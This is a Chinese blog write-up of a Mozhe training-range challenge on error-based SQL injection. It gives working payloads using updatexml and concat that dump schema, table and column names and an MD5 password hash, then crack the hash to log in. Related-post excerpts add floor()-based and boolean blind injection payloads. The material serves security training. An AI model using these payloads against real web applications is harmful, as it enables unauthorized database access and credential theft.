墨者-SQL注入漏洞测试(报错盲注) 题解

最新推荐文章于 2023-11-01 23:43:31 发布
最新推荐文章于 2023-11-01 23:43:31 发布
阅读量514 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: sql注入 靶场 文章标签: sql 数据库 mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/Redredredfish/article/details/121791019
本文详细讲述了在未防护的MySQL系统中,通过公告界面和报错注入技巧,逐步获取数据库敏感信息的过程,包括库名、表名、字段值等,并利用这些信息进行登录。关键步骤包括字符型注入、unionselect、updatexml函数利用和字段值解析。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

靶场地址:https://www.mozhe.cn/bug/detail/Ri9CaDcwWVl3Wi81bDh3Ulp0bGhOUT09bW96aGUmozhe

依旧是mysql、无防护

①依旧是公告界面
url:http://219.153.49.228:44679/new_list.php?id=1
1',1' and '1'='1' -- q,1' and '1'='2' -- q判断存在字符型注入,数据库类型为MariaDB

②order by 判断字段数为4,union select无回显

③尝试报错注入,利用函数updatexml()
updatexml参数(目标xml内容,xml文档路径,更新的内容)
当文档路径包含字符~,会判断不合法,输出字符~报错
利用concat函数将子查询语句与字符~拼接
例如:concat(0x7e,(select user()))
会将查询结果拼接~报错输出
所以尝试

id=1' and updatexml(1,concat(0x7e,(select user())),1) -- q
在这里插入图片描述
判断存在报错注入

④接下来还是联合注入那一套,替换子查询语句即可

id=1' and updatexml(1,concat(0x7e,(select group_concat(schema_name) from information_schema.schemata)),1) -- q
爆出库名information_schema,mysql,perfor

查询perfor库是空的
database()查询出当前数据库为stormgroup,居然不在schema_name里

爆出表名member,notice

表member爆出字段name,password,status

⑤分别查询字段值

id=11111111' and updatexml(1,concat(0x7e,(select group_concat(字段) from member)),1) -- q

name字段:mozhe,mozhe
status字段:0,1
查询password字段时,根据另外两个字段可知有两条数据,因为报错长度最多为32位,字符~占了1位,剩下31位不够输出第一个32位的MD5密码,而且第一条数据status字段值为0,大概率用不了。
直接查询第二条数据

id=11111111' and updatexml(1,concat(0x7e,(select group_concat(password) from member where status='1')),1) -- q
在这里插入图片描述
得到~76e59b744c5db295a5f0b66f2e9a192
依旧少了一位,利用函数substr(字符串,32,1)输出第32位字符

id=11111111' and updatexml(1,concat(0x7e,(select substr(group_concat(password),32,1) from member where status=1)),1) -- q
得到~e
拼一拼得到76e59b744c5db295a5f0b66f2e9a192e
解密得到945748
mozhe/945748登录得到key

者学院-SQL手工注入漏洞测试(MySQL数据库)
多崎巡礼的博客
07-26 3380
此题很简单,可以完全参照 https://blog.youkuaiyun.com/qq_42357070/article/details/81215715 进行解题 以下用cms站点举例: https://pan.baidu.com/s/1uiO2cqZCGquQqyYWr0C7WQ     提交and 1=1 返回内容正常        And 1=2 返回内容为空 确定存在注入漏...
者学院-SQL注入漏洞测试报错
weixin_42939822的博客
03-30 5314
者学院-SQL注入漏洞测试报错
者靶场------SQL注入漏洞测试(报错)
qq_43590351的博客
01-20 879
SQL注入漏洞测试(报错) 自己构造请求参数,然后数据库返回错误的信息,以至于我们能够爆出我们想要的信息 要进行SQL报错注入,首先要了解MySQL的几个函数 (1)concat 用来连接字符串 select concat('m','y','s','q','l')   执行结果为mysql (2)updatexml 第一个参数:XML_document是String格式,为XML文档对象的名称,文中为Doc 第二个参数:XPath_string (Xpath格式的字符串) ,如果不了解Xpath语法
者靶场 SQL注入漏洞测试(报错)通关思路
zyh1588的博客
11-01 700
小白回顾者靶场之sql报错注入
刷题笔记:SQL注入漏洞测试(宽字节)
m0_67399862的博客
06-05 553
刷题笔记:宽字节注入
sql(时间)——者学院——漏洞操作记录
chick11的博客
07-16 296
Sql时间 1、 开始的页面,但是不是这个页面,点击下面的任性网页 2、提示再url中传参,加个逗号 ?type=1’ 既然提示是时间,那就 ?type=1’ and sleep(5)%23 没有时间延迟 去掉单引号 有时间延迟5秒 因为是时间延迟,没有任何回显,那只能用python写脚本或者用sqlmap 这里是脚本,但是后面有错误,我找不到原因,只能查到flag、goods表的字段 import requests import datetime i
-SQL注入漏洞测试(报错)
wh1sper、的博客
07-04 898
-SQL注入漏洞测试前言一、sqlmap二、手1.报错注入2.时间注入3.联合查询union被过滤总结 前言 本题为者学院在线靶场 进入题目发现是个登录界面,找了好久,最后在关于平台停机维护的通知的页面找到了注入点 判断注入类型,当输入?id=1’ and 1=1 %23时,页面显示正常。 ?id=1' and 1=1 %23 当输入?id=1’ and 1=2 %23时,页面显示不正常。 由此判断注入类型为单字符注入。 一、sqlmap 首先先清理sqlmap的缓存。 python sq
者学院-SQL注入漏洞测试(报错)
qq_33598708的博客
04-21 2100
启动靶场正常访问: 随便输入账号和密码: 并没有发现什么可用的信息 点击查看公告: 可以看到详细的公告哈!我们看看能不能在公告上做文章。 /new_list.php?id=1 and 1=1 在我以为可以直接注入的时候,我发现1=2的时候也能正常显示哈!!! 然后在找闭合的时候,发现数据库报错的信息会显示出来。所以我们可以利用数据库报错展示出我们想要的数据。 开始注入: updatexml函数错误 updatexml('XML_document',...
者学院-SQL注入漏洞测试(布尔
weixin_42939822的博客
03-20 4478
决心按部就班、由浅入深地去剖析下sql注入题目提供的靶场环境,完善自身解题思路。本题靶场环境比较简单、也比较常见,没有设置严格的过滤规则,仅仅是限制了页面的回显功能,属于比较初级的sql注入题目。废话不多说啦,先附上题目链接:https://www.mozhe.cn/bug/detail/UDNpU0gwcUhXTUFvQm9HRVdOTmNTdz09bW96aGUmozhe*
【CISP-PTE】SQL注入练习题
西原一点红的博客
06-26 2146
得到 flag n1book{union_select_is_so_cool}通过SQL注入漏洞读取/tmp/360/key文件,答案就在文件中。爆出有两个表 Article IS_KEY。发现回显内容被截取,结果显示不全,参考文档。sqlmap注入并执行sql-shell。题目明确提示过滤了释符 # –sqlmap执行sql shell。发现列数为6时,回显字段2。
SQL注入——基于报错注入(五)
Gjqhs的博客
02-18 1220
本章目的 普及报错功能函数extractvalue()的用法,演示基于报错SQL注入基本流程。 实验环境 攻击机:Pentest-Atk (1)操作系统:Windows10 (2)安装的应用软件:Sqlmap、Burpsuite、FireFox浏览器及其插件Hackbar、等 (3)登录账号密码:操作系统帐号Administrator,密码Sangfor!7890 想机:A-SQLi-Labs (1)操作系统:Centos7 (2)安装的应用软件:Apache、MySQL(MariaDB)、PHP:DV
sqli-labs(54-65)
qq_43395215的博客
08-26 696
文章目录第54关:第55关:第56关:第57关:第58关:第59关:第60关:第61关:第62关:第63关:第64关:第65关: 第54关: 根据这一关的提示,我们可以知道数据库的名字“chellenges”,我们需要知道“dump”的密码,才能通关,而且只有10次尝试机会 因为只有10次机会,所以判断闭合时需要猜测最常见的,所以先判断单引号、然后双引号、整形、最后括号 闭合方式: /Less-54/?id=-1' union select 1,2,3--+ 因为一直到库名,需要判断表名,意语句要一次正
者学院-密码学加解密实训(摩斯密码第1题)
JimWu的博客
09-05 793
密码学加解密实训(摩斯密码第1题) 难易程度:★ 题目类型:代码审计 使用工具:FireFox浏览器、winhex、audacity 1.打开靶场,下载文件,解压文件。 2.使用winhex打开文件,看到头格式为wav格式。 3.把文件后缀改为wav,wav是一种声音格式文件。用音频编辑器audacity打开文件,能清晰看出声音长短。 一短为. 一长为- 用/隔开。 最后为.–/.–/.–/....
sql注入相关考题
安全界的彭于晏的博客
06-24 928
1.SQL注入的原理 用户 可控参数中注入SQL语法,破坏原有SQL结构, 达到编写程序时意料之外结果的攻击行为 某成因可以归结为以下两个原因叠加造成的: 1.程序编写者在处理应用程序和数据库交互时, 使用字符串拼接的方式构造SQL语句。 2.未对用户可控参数进行足够的过滤便将参数内容拼接进入到SQL查询语句中。 2.sql注入产生原因 sql注入攻击是利用是指利用设计上的漏洞, 在目标服务器上运行Sql语句以及进行其他方式的攻击, 动态生成Sql语句时没有对用户
报错注入的一些整理 By Assassin
Assassin
01-29 1299
mysql暴错注入方法整理,通过floor,UpdateXml,ExtractValue,NAME_CONST,Error based Double Query Injection等方法SQL注入1、通过floor暴错 /数据库版本/ http://www.waitalone.cn/sql.php?id=1+and(select 1 from(select count(*),concat((se
CTF-SQL过滤字符后手工注入漏洞测试(第1题)
asd158923328的博客
08-21 1075
根据题意 SQL注入原理:SQL注入攻击指的是通过构建特殊的输入作为参数传入Web应用程序,而这些输入大都是SQL语法里的一些组合,通过执行SQL语句进而执行攻击者所要的操作,其主要原因是程序没有细致地过滤用户输入的数据,致使非法数据侵入系统。 进入环境,加’ 和 -1 1+0页面发生变化,返回页面不存在,或者显错,存在注入点 进一步发现,空格和‘=’也被过滤掉了 所以‘=’可以用Like 替...
MYSQL报错注入方法整理
weixin_30820151的博客
08-20 248
1、通过floor暴错 /*数据库版本*/ SQL http://www.hackblog.cn/sql.php?id=1 and(select 1 from(select count(*),concat((select (select (select concat(0x7e,version(),0x7e))) from information_schema.tables limit...
者学院--SQL注入漏洞测试(布尔)
老司机开代码的博客
08-03 722
文章目录题意解析注入过程爆数据库名爆表名爆字段名 今天做了一道者学院的题目。头皮发麻。 题意解析 要求是找出moezhe开头的32为的key。 先看一下题目: 开始一看是这个界面,第一感觉以为是post提交表单的注入漏洞,然后一顿操作猛如虎,结果人都傻了。接着,底下那个通知就一直在那晃荡,抱着试试看的心理点进去,结果就发现了新大陆。 ?id,多么亲切的老朋友啊。一下子就豁然开朗了。 通过...
SQL注入报错注入的一些随笔
郁离歌丶的博客
03-21 4702
0x00.序言关于报错注入的话虽然我在我之前的文章里面写了一些,但是sql注入的姿势实在是太多了。之前写过的payload不全也不系统。今天抽出时间来总结一下。ps:关于报错注入的原理和使用的基本函数我在我之前的文章《SQLI-LABS修炼笔记(二)》中已经详细说过了,如果不懂可以去看看。ps的ps:这里以SQLI-LABS的LESS-5为例题作为示范。0x01.floor()报错注入http:/...
SQL注入漏洞测试(布尔)
最新发布
12-27
### SQL 注入漏洞测试中的布尔方法 布尔是一种通过观察应用程序响应来推断查询结果的技术。攻击者发送特定的输入给服务器,如果返回的结果满足某些条件,则表示注入成功。 #### 原理说明 在布尔中,攻击者构建SQL语句使得其逻辑部分依赖于某个假设是否成立。通常情况下,会尝试逐位猜测目标字符串的内容。例如,可以先判断某字符是否小于等于'f',再进一步缩小范围直到确定具体值[^1]。 #### 实施过程 为了实现这一目的,常用的技巧是在原始查询基础上附加额外的`AND`子句: ```sql AND ASCII(SUBSTRING((SELECT table_name FROM information_schema.tables LIMIT 1), 1, 1)) < 77 ``` 上述代码片段用于比较表名第一个字母对应的ASCII码与指定数值之间的大小关系。当此表达式的计算结果为真时,整个请求将正常处理并显示预期页面;反之则可能出现错误提示或其他异常行为。 #### 自动化工具辅助 对于复杂的场景下手动编写payload较为困难,此时可借助像SQLMap这样的自动化工具来进行更高效的探测工作。这类软件能够自动生成多种类型的测试向量,并根据反馈调整后续操作策略[^3]。 #### 权限控制的重要性 值得意的是,在实际环境中应当严格限制Web应用所使用的数据库账户权限至最低必要水平。即使存在潜在的安全隐患也能有效遏制可能造成的损害程度[^2]。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Redredredfish

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值